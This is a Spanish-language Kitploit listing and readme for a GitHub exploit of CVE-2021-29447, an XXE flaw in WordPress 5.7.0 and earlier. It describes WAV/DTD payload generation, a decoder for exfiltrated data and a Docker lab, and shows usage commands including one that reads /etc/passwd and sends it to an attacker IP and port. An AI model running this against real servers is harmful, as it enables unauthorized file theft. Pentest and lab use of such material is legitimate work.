Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-29447 — Exploit para CVE-2021-29447, una vulnerabilidad XXE en WordPress 5.7.0 y anteriores. Genera cargas útiles WAV maliciosas para leer archivos arbitrarios del servidor mediante inyección de entidad externa XML. Incluye entorno de prueba Docker. | Kitploit
Herramientas/GitHubGitHub/danilo1992-sys/cve-2021-29447
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

Exploit para CVE-2021-29447, una vulnerabilidad XXE en WordPress 5.7.0 y anteriores. Genera cargas útiles WAV maliciosas para leer archivos arbitrarios del servidor mediante inyección de entidad externa XML. Incluye entorno de prueba Docker.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 mesesAún no revisado

CVE-2021-29447 - WordPress XXE Vulnerability Exploit

Descripcion

Este repositorio contiene un exploit para CVE-2021-29447, una vulnerabilidad de XXE (XML External Entity) presente en WordPress 5.7.0 y versiones anteriores. La vulnerabilidad existe en la biblioteca medemblic que procesa archivos WAV, permitiendo a un atacante leer archivos arbitrarios del servidor.

Requisitos

  • Bash
  • Python 3
  • Docker y Docker Compose (para levantar entorno de prueba)
  • Servidor WordPress vulnerable (5.7.0 o inferior)

Archivos

ArchivoDescripcion
CVE-2021-29447.shScript de explotacion que genera el payload WAV y archivo DTD malicioso
decode.phpScript PHP para decodificar datos exfiltrados (base64 + zlib)
docker-compose.ymlEntorno Docker con WordPress vulnerable para pruebas

Uso

1. Levantar entorno de prueba

root@kitploit:~
docker-compose up -d

2. Ejecutar exploit

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <archivo_objetivo>

Parametros:

  • -l IP del atacante (LHOST)
  • -p Puerto del atacante (LPORT)
  • -f Ruta del archivo a leer en el servidor
  • -h Mostrar ayuda

Ejemplo:

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. Decodificar datos

Los datos exfiltrados vendran codificados en base64 y comprimidos con zlib. Para decodificarlos:

root@kitploit:~
php decode.php

Tecnica

El exploit funciona insertando una entidad externa XXE en los metadatos de un archivo WAV. Cuando WordPress procesa el archivo, el parser XML resuelve la entidad externa, causando que el servidor realize una peticion HTTP al servidor del atacante con el contenido del archivo codificado en la URL.

Referencias

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

Aviso

Este codigo es solo para fines educativos y de pruebas de penetracion autorizadas. No utilizar en sistemas sin autorizacion explicita.

Descargar herramienta